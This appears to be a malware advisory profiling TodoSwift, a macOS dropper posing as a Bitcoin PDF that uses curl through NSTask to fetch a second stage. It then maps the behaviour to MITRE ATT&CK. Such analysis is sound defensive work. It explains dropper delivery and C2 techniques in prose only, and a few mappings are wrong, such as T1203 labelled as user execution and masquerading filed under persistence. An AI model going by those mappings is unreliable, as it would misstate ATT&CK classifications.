TodoSwift (Dropper) – Malware

Overview

A new and sophisticated macOS malware named TodoSwift has emerged, capturing the attention of the cybersecurity community due to its deceptive techniques and the threat it poses to macOS users. Identified on August 21, 2024, TodoSwift is a dropper application that masquerades as a seemingly innocent PDF related to Bitcoin pricing. This social engineering tactic lures unsuspecting victims into executing the malware, unaware of the hidden danger it carries. While appearing harmless, TodoSwift is a carefully crafted malware developed using Swift/SwiftUI, two powerful programming frameworks for macOS, adding an additional layer of complexity to its execution.

Targets

Individuals

How they operate

Upon first contact, TodoSwift employs a social engineering strategy, presenting itself as an innocent PDF related to Bitcoin pricing. The malware is often distributed through phishing emails or malicious websites, where users are tricked into downloading the file. What seems to be a harmless document is, in fact, a dropper—a type of malware designed to initiate the infection process by deploying additional malicious payloads onto the victim’s machine. The attacker behind TodoSwift uses Google Drive URLs to host the malware, leveraging the trust users have in reputable cloud storage services. By using these services, the attacker avoids raising suspicion and makes the malware more difficult to detect.

Once downloaded, TodoSwift operates by executing a dropper application, which has been developed using Swift and SwiftUI—two modern programming languages for macOS and iOS development. The malware’s first action is to use NSTask, an Apple API used to execute external system commands. With NSTask, the malware runs curl commands, a commonly used command-line tool in Unix-based systems. These curl commands retrieve the second-stage payload from remote servers controlled by the attacker. The payload may then be executed on the system, completing the infection cycle and potentially allowing the attacker to take full control of the compromised device.

The malware uses Command and Control (C2) communication to establish a persistent link between the compromised device and the attacker’s servers. TodoSwift’s C2 communication often relies on HTTP protocols to send and receive data, which makes it harder to detect since web traffic is typically seen as benign. In addition, TodoSwift makes use of command-line arguments passed during execution, which include embedded C2 URLs. These URLs point to remote servers, where additional malicious payloads or instructions are hosted. Once connected, the compromised system can download more sophisticated malware, upload sensitive information, or execute further commands, all under the attacker’s control.

TodoSwift’s use of NSTask and curl commands reflects a clear technical design choice to blend in with regular system operations, thus avoiding detection by traditional security mechanisms. The reliance on macOS system APIs and the use of trusted cloud services for the delivery mechanism are key factors in making the malware difficult to spot in its early stages. Additionally, TodoSwift’s ability to interact with remote servers via web protocols further complicates detection efforts by security tools that might not flag routine web traffic as suspicious.

In summary, TodoSwift is a well-crafted malware that capitalizes on user trust, macOS system capabilities, and modern web protocols to carry out its attack. By masquerading as a legitimate PDF, using cloud storage services for delivery, and executing commands via system APIs, it presents a significant threat to macOS users. The malware’s success hinges on its ability to remain stealthy during the initial infection phase, ultimately enabling attackers to steal data or deploy additional malicious software without detection. The increasing sophistication of such threats underscores the need for enhanced security practices, including awareness of social engineering tactics and the use of robust endpoint protection systems.

MITRE Tactics and Techniques

1. Initial Access

Phishing (T1566): Although TodoSwift masquerades as a legitimate PDF file, it follows a social engineering tactic to deceive the user into downloading and executing the malware. The fake PDF is likely distributed via email or other deceptive methods, which is common in phishing attacks.

Drive-by Compromise (T1189): The malware is hosted on Google Drive, which is a trusted cloud storage service. Attackers often use reputable services to disguise the origin of the malicious content and trick users into downloading it.

2. Execution

User Execution (T1203): Once the user opens the disguised PDF, the malware is executed. This is a key step where the user unknowingly runs the dropper, starting the attack sequence.

Command and Scripting Interpreter (T1059): TodoSwift uses NSTask to execute system commands via the curl command-line tool. This technique is often used to download or retrieve malicious payloads from a remote server.

3. Persistence

Masquerading (T1036): TodoSwift masquerades as a legitimate PDF document to evade detection. By using a trusted file type and naming conventions that appear to be innocuous, it maintains persistence on the system by remaining undetected for as long as possible.

4. Command and Control

Application Layer Protocol (T1071): TodoSwift communicates with a command-and-control (C2) server using web protocols like HTTP. It uses cloud-based storage URLs (such as Google Drive) and embedded C2 URLs in the launch arguments to exfiltrate data or receive further instructions from the attacker.

5. Exfiltration

Exfiltration Over Command and Control Channel (T1041): After retrieving the second-stage payload, the malware is capable of communicating with remote servers over the C2 channel. This can include sending data from the compromised system to the attackers.

6. Impact

Data Manipulation (T1565): If the second-stage payload allows the attackers to modify, steal, or manipulate system data (including files, credentials, or system settings), this could fall under the impact category.

References:

• TodoSwift Disguises Malware Download Behind Bitcoin PDF
• TodoSwift: New macOS threat masquerading as a PDF